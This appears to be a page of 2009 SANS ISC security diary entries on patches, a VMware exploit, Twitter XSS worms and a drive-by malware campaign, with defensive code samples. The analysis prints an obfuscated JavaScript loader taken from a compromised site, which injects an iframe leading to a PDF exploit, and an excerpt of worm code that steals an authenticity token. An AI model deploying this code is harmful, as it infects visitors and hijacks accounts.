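AV = {"L": 0.395, "A": 0.646, "N": 1.0}    # access vector: local, adjacent, network
AC = {"H": 0.35, "M": 0.61, "L": 0.71}     # access complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}    # authentication: multiple, single, none
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}   # impact: none, partial, complete


def base_score(vector: str) -> float:
    """Compute a CVSS v2 base score from a vector like 'AV:N/AC:L/Au:N/C:P/I:P/A:P'."""
    m = dict(part.split(":") for part in vector.split("/"))
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    if impact == 0:
        return 0.0  # f(Impact) = 0, so the whole score is 0
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    raw = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * 1.176
    # Round to one decimal place (half-up, avoiding Python's round-half-even).
    return float(Decimal(str(raw)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


if __name__ == "__main__":
    for v in ("AV:N/AC:L/Au:N/C:C/I:C/A:C", "AV:N/AC:L/Au:N/C:P/I:P/A:P"):
        print(v, base_score(v))
```

A remotely reachable, unauthenticated, low-complexity flaw with complete impact scores the maximum 10.0. Changing any single parameter shows quickly which factor drives a given rating.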

--

Swa Frantzen -- Section 66


April Black Tuesday Overview

Overview of the April 2009 Microsoft patches and their status.

| # | Description | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) clients | ISC rating(*) servers |
|---|---|---|---|---|---|---|---|
| MS09-009 | Multiple memory corruption vulnerabilities allow random code execution. Also affects Excel Viewer and Mac OS X versions of Microsoft Office. Replaces MS08-074. | Excel CVE-2009-0100 CVE-2009-0238 | KB 968557 | Actively exploited | Severity: Critical Exploitability: 2,1 | PATCH NOW | Important |
| MS09-010 | Multiple vulnerabilities allow random code execution. Replaces MS04-027. | Wordpad & Office converters CVE-2008-4841 CVE-2009-0087 CVE-2009-0088 CVE-2009-0235 | KB 960477 | Actively exploited. CVE-2008-4841 was SA960906 | Severity: Critical Exploitability: 1,2,1,1 | PATCH NOW | Important |
| MS09-011 | MJPEG (don't confuse with MPEG) input validation error allows random code execution. Replaces MS08-033. | DirectX CVE-2009-0084 | KB 961373 | No publicly known exploits | Severity: Critical Exploitability: 2 | Critical | Important |
| MS09-012 | Multiple vulnerabilities allow privilege escalation and random code execution. Affects servers with IIS and SQL Server installed, and more. Replaces MS07-022, MS08-002 and MS08-064. | Windows CVE-2008-1436 CVE-2009-0078 CVE-2009-0079 CVE-2009-0080 | KB 959454 | Actively exploited, exploit code publicly available | Severity: Important Exploitability: 1,1,1,1 | Important | Critical (**) |
| MS09-013 | Multiple vulnerabilities allow random code execution, spoofing of HTTPS certificates and NTLM credential reflection. Related to MS09-014 (below). | HTTP services CVE-2009-0086 CVE-2009-0089 CVE-2009-0550 | KB 960803 | Exploit is publicly known | Severity: Critical Exploitability: 1,1,1 | Critical | Important |
| MS09-014 | Cumulative MSIE patch. Replaces MS08-073, MS08-078 and MS09-002. Related to MS09-010, MS09-013 (above) and MS09-015 (below). | IE CVE-2008-2540 CVE-2009-0550 CVE-2009-0551 CVE-2009-0552 CVE-2009-0553 CVE-2009-0554 | KB 963027 | Exploit code publicly available | Severity: Critical Exploitability: 3,1,2,3,3,1 | PATCH NOW | Important |
| MS09-015 | Update to make the system search for libraries in the system directory first by default, plus an API to change the order. Replaces MS07-035. Related to MS09-014 (above). | SearchPath CVE-2008-2540 | KB 959426 | Attack method publicly known (SA953818) | Severity: Moderate Exploitability: 2 | Important | Important |
| MS09-016 | Multiple input validation vulnerabilities allow a DoS and XSS. | ISA Server CVE-2009-0077 CVE-2009-0237 | KB 961759 | CVE-2009-0077 is publicly known | Severity: Important Exploitability: 3,3 | N/A | Critical |

We appreciate updates

US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

- We use 4 levels:

- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.

- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.

- Important: Things where more testing and other measures can help.

- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.

- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.

- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for how many affected systems there are. It is for an affected system in a typical worst-case role.

- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.

- All patches released by a vendor are important enough to have a close look at if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): For shared IIS installations: upgrade this rating to PATCH NOW

--

Swa Frantzen -- Section 66


VMware exploits - just how bad is it ?

When Tony reported on the release of new VMware patches on April 4th, we didn't immediately spot that the same day there was also a release of a for-pay exploit against CVE-2009-1244 (announced in VMSA-2009-0006).

A few days later, a white paper became available (also for pay), and now there is also a Flash video of the alleged exploit showing an XP client OS exploiting a Vista host OS (launching calc.exe). The video also claims a data leak from the host back to the client (hard to tell; all you see is a number of pixels being mangled on the screen).

The consequences of this are important. Virtualisation is often used just to consolidate different functions on shared hardware, and I've seen great uses of it, e.g. to keep running an accounting package that needed an OS that no longer runs on modern hardware. I've also seen great uses where machine images were cloned to give users access to archived machines, with the clone removed after use to preserve the integrity of those systems.

But there are more risky uses:

- Virtualisation is also often used instead of physical separation of systems, and vulnerabilities like this one, and the exploits against them, are a real issue one needs to address if virtualisation is going to be used as a security measure.

I've helped with a number of studies where such use was contemplated for highly critical assets, not just using Windows and VMware, but also using nearly mainframe-grade Unix solutions. I have always held the view that software separation will always be riskier than an airgap.

But it's a hard sell, as there often is no hard evidence that it can be broken (and vendors usually tell your customer it cannot). That Flash video might be what one needs to stop those taking chances they ought not to take, and to make them weigh the benefits against the risk they are taking.

- Those doing malware investigation often use virtual machines, as it's easier to wipe them after they get infected and it's possible to run a number of them and let them communicate with each other. They already face malware that detects VMware and refuses to run its course (so it cannot be studied without actually understanding the machine code). If you don't keep up to date (and even if you do: the exploit was for sale on the same day as the patch, hence it existed earlier), that separation might still lead to exploitation of the host OS.

--

Swa Frantzen -- Section 66

0 Comments

Twitter worm copycats

Yesterday Patrick wrote about a Twitter worm exploiting an XSS vulnerability in Twitter's profile page. Besides the "original" worm, supposedly written by a teenager named Mike Mooney, there are now some copycats out.

The copycat Twitter XSS worms exploit the same vulnerability. In fact, most of the code remains the same, but they obfuscated it to make analysis a bit harder. They also added a couple of updates: it looks like they are exploiting other profile setting fields that the original worm didn't touch, such as the profile link color.

One thing about this copycat worm I found interesting is the type of obfuscation they used. The attackers used the [ and ] operators in JavaScript in order to reference methods in objects. While this is nothing new, of course, I found it interesting that I wrote a diary about this almost exactly a week ago (http://isc.sans.org/diary.html?storyid=6142) – are they reading the ISC diaries?

You can see an excerpt of the worm code below:

function wait(){
  var content=document[_0x67cc[0x24]][_0x67cc[0x23]];
  authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var _0x6666x17=authreg[_0x67cc[0x25]](content);
  _0x6666x17=_0x6666x17[0x1];

_0x67cc is just an array the attackers define at the beginning, which contains all the keywords. The array's contents are hex encoded so they can't be read directly (but they can easily be translated into ASCII, of course). The element _0x67cc[0x24] above is "documentElement", while _0x67cc[0x23] is "innerHTML", so they simply end up reading document.documentElement.innerHTML.
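To see why this works, here is a minimal sketch (not the worm's actual code) of the same two tricks: a lookup table of hex-escaped strings, and bracket notation in place of dot notation. The names `table`, `fakeDocument` and `decodeHexEscapes` are hypothetical, and we assume the worm's array uses `\xNN` escapes, which is the usual form for this kind of obfuscation.

```javascript
// Hypothetical lookup table in the style of _0x67cc. Inside a string literal,
// \xNN is decoded by the JavaScript parser, so these entries are simply
// "documentElement" and "innerHTML".
const table = [
  "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74",
  "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
];

// A plain object standing in for the browser's document, so this runs in Node.
const fakeDocument = { documentElement: { innerHTML: "<html>...</html>" } };

// Bracket notation with a computed key reads the same property as dot notation.
const viaDot = fakeDocument.documentElement.innerHTML;
const viaBrackets = fakeDocument[table[0]][table[1]];

// For analysis of raw source text (where the escapes are still literal
// backslash sequences), decode \xNN without evaluating any of the script.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

console.log(table.join(", "));       // documentElement, innerHTML
console.log(viaDot === viaBrackets); // true
console.log(decodeHexEscapes("\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C")); // innerHTML
```

Because the parser itself decodes the escapes, printing only the array definition is often the quickest way to read such a worm; a text-level decoder like the one above avoids running anything at all.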

It looks like the folks at Twitter are still fixing all the vulnerabilities (I wonder how they missed this in the first place), so be careful: we can expect even more copycat worms trying to capitalize on this. Use add-ons such as NoScript for Mozilla and, if you are a web developer, be sure to follow the recommendations from OWASP.
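Two of the core OWASP recommendations are to validate input against a strict whitelist and to encode output for the context it lands in. The sketch below applies both to profile fields like the ones these worms abused. It is an illustration under our own assumptions, not Twitter's actual fix, and the helper names `isValidLinkColor` and `escapeHtml` are hypothetical.

```javascript
// Whitelist validation: a link color should be a 3- or 6-digit hex color,
// optionally prefixed with '#', and nothing else. Anything carrying markup,
// quotes or script is rejected outright.
function isValidLinkColor(value) {
  return /^#?(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$/.test(value);
}

// Output encoding for HTML element content and quoted attribute values:
// replace the characters that let data break out into markup. '&' must go first.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

const color = "#ff0000";
if (isValidLinkColor(color)) {
  console.log(`<a style="color: ${color}">profile</a>`);
}
console.log(escapeHtml('"><script>alert(1)</script>'));
// &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
```

Note that HTML encoding is only correct for HTML contexts; values placed inside JavaScript, CSS or URLs need their own context-specific encoding, which is why a tight whitelist is the safer choice for a field like a color.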

--

Bojan

INFIGO IS

0 Comments

Twitter Worm(s)

We've received a number of reports from readers pointing to articles about this weekend's Twitter XSS worm; F-Secure has details and an update warning about more to come. Keeping in touch has never been easier.

0 Comments

Hosted javascript leading to .cn PDF malware

Unfortunately, such subject lines are all too common. However, let's work through this one together to show an excellent tool and a common source.

Steve Burn over at it-mate.co.uk submitted an investigation they had been running into a number of compromised sites, all hosted by a single hosting provider, that were leading visitors to malware.

So, let's look at a few examples:

First, as simple proof that the exploit is still in place, let's look at:

hxxp://www.adammcgrath.ca (216.97.237.30 - Whois : OrgName: Lunar Pages)

If you simply curl or wget the home page of this site, you'll get:

function c32aee72b6q49ce6d11e3bbe(q49ce6d11e438d){ var q49ce6d11e4b6d=16; return
(eval('pa'+'rseInt')(q49ce6d11e438d,q49ce6d11e4b6d));}function q49ce6d11e5afc(q4
9ce6d11e62cc){ var q49ce6d11e6ab5='';q49ce6d11e89dc=String['fromCharCode'];for(
q49ce6d11e7271=0;q49ce6d11e7271<q49ce6d11e62cc.length;q49ce6d11e7271+=2){ q49ce6
d11e6ab5+=(q49ce6d11e89dc(c32aee72b6q49ce6d11e3bbe(q49ce6d11e62cc.substr(q49ce6d
11e7271,2))));}return q49ce6d11e6ab5;} var vd1='';var q49ce6d11e91ab='3C7'+vd1+'
3637'+vd1+'2697'+vd1+'07'+vd1+'43E696628216D7'+vd1+'96961297'+vd1+'B646F637'+vd1
+'56D656E7'+vd1+'42E7'+vd1+'7'+vd1+'7'+vd1+'2697'+vd1+'465287'+vd1+'56E657'+vd1+
'363617'+vd1+'065282027'+vd1+'2533632536392536362537'+vd1+'322536312536642536352
532302536652536312536642536352533642536332533332533322532302537'+vd1+'332537'+vd
1+'32253633253364253237'+vd1+'2536382537'+vd1+'342537'+vd1+'342537'+vd1+'3025336
12532662532662536332536632536312537'+vd1+'32253631253636253639253665253265253639
2536652536362536662532662537'+vd1+'342537'+vd1+'32253631253636253636253266253639
2536652536342536352537'+vd1+'382532652537'+vd1+'302536382537'+vd1+'3025336625323
7'+vd1+'2532622534642536312537'+vd1+'342536382532652537'+vd1+'322536662537'+vd1+
'352536652536342532382534642536312537'+vd1+'342536382532652537'+vd1+'32253631253
665253634253666253664253238253239253261253337'+vd1+'253335253334253337'+vd1+'253
337'+vd1+'253239253262253237'+vd1+'253330253237'+vd1+'2532302537'+vd1+'37'+vd1+'
2536392536342537'+vd1+'34253638253364253334253331253337'+vd1+'253230253638253635
253639253637'+vd1+'2536382537'+vd1+'342533642533312533382533312532302537'+vd1+'3
32537'+vd1+'342537'+vd1+'39253663253635253364253237'+vd1+'2537'+vd1+'36253639253
7'+vd1+'332536392536322536392536632536392537'+vd1+'342537'+vd1+'3925336125363825
3639253634253634253635253665253237'+vd1+'2533652533632532662536392536362537'+vd1
+'3225363125366425363525336527'+vd1+'29293B7'+vd1+'D7'+vd1+'6617'+vd1+'2206D7'+v
d1+'969613D7'+vd1+'47'+vd1+'27'+vd1+'5653B3C2F7'+vd1+'3637'+vd1+'2697'+vd1+'07'+
vd1+'43E';document.write(q49ce6d11e5afc(q49ce6d11e91ab));

At the ISC, we've talked a number of times about methods to decode such JavaScript, from TEXTAREA manipulation in the good old days through to tools such as Malzilla to aid our analysis. However, both our intrepid reader and I like to use Wepawet.
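If you would rather decode by hand, note that the two helper functions in the script above simply read the long string two hex digits at a time, convert each pair to a character, and hand the result to document.write. The sketch below reproduces that decoding but returns the text instead of writing it into a page, so nothing is executed. `decodeHexPairs` is our own hypothetical name. The second step reflects our reading of this sample, in which the decoded text appears to contain a further %-escaped layer passed to unescape().

```javascript
// Same logic as the sample's helpers: parse the string two hex digits at a
// time and convert each pair to a character. Unlike the original, this
// returns the text rather than passing it to document.write.
function decodeHexPairs(hex) {
  let out = "";
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// The sample pads its string with an empty variable (vd1 = '') to break up
// signatures; after concatenation the padding vanishes. These are the first
// pieces of the sample's string, with the last piece trimmed to '43E'.
const vd1 = "";
const firstChunk = "3C7" + vd1 + "3637" + vd1 + "2697" + vd1 + "07" + vd1 + "43E";
console.log(decodeHexPairs(firstChunk)); // <script>

// Second layer (assumption based on this sample): %-escaped text meant for
// unescape(); for plain ASCII escapes decodeURIComponent gives the same result.
const layer1 = decodeHexPairs("253363253639253636253732253631253664253635");
console.log(layer1);                     // %3c%69%66%72%61%6d%65
console.log(decodeURIComponent(layer1)); // <iframe
```

Decoding statically like this is slower than letting a service such as Wepawet run the script, but it never gives the payload a chance to execute.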

Analysis with this couldn't be easier: enter the URL, click, and wait for the response. So let's see what Wepawet shows for this web site.

http://wepawet.cs.ucsb.edu/view.php?hash=ae4855ee814ab2c158ac3d9361429a75&t=1239303649&type=js

If you follow through the analysis provided by Wepawet, you'll see that it bounces through clarafin.info.

Google Safe Browsing also shows that this domain is (or has been) hostile:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 10 domain(s), including sound.jp/ohira/, ucoz.net/,cmizziconstruction.com/.

Following the malware trail leads to hxxp://clarafin.info/traff/index.php?, which redirects to hxxp://letomerin.cn/x0/index.php.

Finally, a PDF exploit is attempted and a piece of malware is dropped onto the unsuspecting system; as always, the VirusTotal results show very little AV coverage.

Now all this isn't very unusual, and having a large number of compromised hosts isn't either. What is interesting here is that a single provider is hosting these compromised pages.

Steve's investigations came to an end when the hosting provider commented that:

"So far, all I've received is a form-letter stating it wasn't a compromise of their servers, but hackers going round finding exploitable scripts written by their customers"

Now this may be the case, as there does appear to be some level of commonality between the sites. However, surely a duty of care exists here, given that the hosting provider is unwittingly hosting drive-by malware that very few AV products detect.

Steve Hall

ISC Handler

0 Comments

Patches for critical VMware vulnerability

Our friends at VMware have made the ISC aware of new patches, for both VMware hosted products and ESX, that address a vulnerability allowing code execution on the host server from a guest operating system.

The following releases have generally available patches:

- VMware Workstation 6.5.1 and earlier

- VMware Player 2.5.1 and earlier

- VMware ACE 2.5.1 and earlier

- VMware Server 2.0

- VMware Server 1.0.8 and earlier

- VMware Fusion 2.0.3 and earlier

- VMware ESXi 3.5 without patch ESXe350-200904201-O-SG

- VMware ESX 3.5 without patch ESX350-200904201-SG

- VMware ESX 3.0.3 without patch ESX303-200904403-SG

- VMware ESX 3.0.2 without patch ESX-1008421

Depending on your version, your only option may be to upgrade rather than patch.
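To triage an inventory against the hosted-product list above, a numeric version comparison is enough. The sketch below encodes only the hosted products (ESX and ESXi are judged by whether a specific patch is installed, which a version number alone cannot tell you). The product labels and helper names are our own, we read "VMware Server 2.0" literally as 2.0.0, and VMware's advisory remains the authoritative list.

```javascript
// Affected hosted products from the list above. `max` is an inclusive upper
// bound; `min` (optional) is an inclusive lower bound. VMware Server appears
// twice because 2.0 and "1.0.8 and earlier" are listed separately.
const AFFECTED = [
  { product: "Workstation", max: "6.5.1" },
  { product: "Player", max: "2.5.1" },
  { product: "ACE", max: "2.5.1" },
  { product: "Server", min: "2.0", max: "2.0" },
  { product: "Server", max: "1.0.8" },
  { product: "Fusion", max: "2.0.3" },
];

// Compare dotted version strings numerically; missing parts count as 0,
// so "2.0" equals "2.0.0". Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] ?? 0;
    const y = pb[i] ?? 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// True if the product/version pair falls inside any listed range.
function isAffected(product, version) {
  return AFFECTED.some(
    (r) =>
      r.product === product &&
      compareVersions(version, r.max) <= 0 &&
      (r.min === undefined || compareVersions(version, r.min) >= 0)
  );
}

console.log(isAffected("Workstation", "6.5.1")); // true
console.log(isAffected("Workstation", "6.5.2")); // false
console.log(isAffected("Fusion", "2.0.4"));      // false
```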

Steve Hall

ISC Handler

0 Comments

Firefox 3 updates now in Seamonkey

If you use Seamonkey's all-in-one environment as a web, mail and newsgroup client, HTML editor, IRC chat client or even a web development tool, you should update.

The recent Firefox 3 security updates have now been rolled up into Seamonkey 1.1.16.

The latest version, and details of what's been fixed, are available on their web site.

0 Comments

Something for the holiday? Nessus 4 is out

The people over at Tenable have released Nessus version 4 just in time to give us all something to play with over the holiday break. A full list of improvements is available on Tenable's blog.

Some of the big changes include: engine changes for scalability, PCI-DSS compliance checks, PCRE within NASL, and XSLT transformations in reports.

0 Comments

Cisco security advisory

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA and PIX appliances.

http://www.cisco.com/en/US/products/products_security_advisory09186a0080a994f6.shtml

* VPN Authentication Bypass when Account Override Feature is Used vulnerability

* Crafted HTTP packet denial of service (DoS) vulnerability

* Crafted TCP Packet DoS vulnerability

* Crafted H.323 packet DoS vulnerability

* SQL*Net packet DoS vulnerability

* Access control list (ACL) bypass vulnerability

The VPN authentication bypass depends on the Override Account Disabled feature being enabled; it is disabled by default.

The crafted HTTP/HTTPS vulnerability is triggered by specially crafted packets, can be triggered on any interface with ASDM enabled, and does not require a completed 3-way handshake (spoofable).

The TCP packet DoS vulnerability also requires specially crafted packets. It can be triggered when such packets are sent to any TCP-based service on the device, can be triggered by transit traffic if the TCP intercept features are enabled, and doesn't require a completed 3-way handshake (spoofable).

The H.323 packet DoS requires H.323 inspection, which is enabled by default. It again requires specially crafted packets and doesn't require a completed 3-way handshake (spoofable).

The SQL*Net packet DoS requires SQL*Net inspection, which is enabled by default. It requires specially crafted packets and does not require a completed 3-way handshake (spoofable).

The ACL bypass vulnerability is a bypass of the implicit deny at the end of the rule set, so if your rule sets have an explicit deny at the end, you're not vulnerable. You should ALWAYS put an explicit deny rule at the end of all firewall rule sets!
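Why does an explicit deny help? Rule sets are evaluated top-down, the first match wins, and the implicit deny only applies when nothing has matched. The toy model below (plain JavaScript, not ASA configuration; the rule fields and the `evaluate` helper are hypothetical) shows that once an explicit "deny any" rule ends the list, every packet is decided by your own rules, so a flaw in the fallback path is never reached.

```javascript
// A toy first-match rule evaluator. Each rule has an action and a predicate;
// `fallback` stands in for the firewall's implicit deny at the end of the list.
function evaluate(rules, packet, fallback) {
  for (const rule of rules) {
    if (rule.matches(packet)) return rule.action; // first match wins
  }
  return fallback; // only reached when no rule matched
}

const permitWeb = { action: "permit", matches: (p) => p.proto === "tcp" && p.dstPort === 80 };
const denyAny = { action: "deny", matches: () => true };

const ssh = { proto: "tcp", dstPort: 22 };

// Model a flawed implicit deny by making the fallback "permit".
const brokenFallback = "permit";

console.log(evaluate([permitWeb], ssh, brokenFallback));          // permit (bypass)
console.log(evaluate([permitWeb, denyAny], ssh, brokenFallback)); // deny
```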

0 Comments

Conficker Working Group site down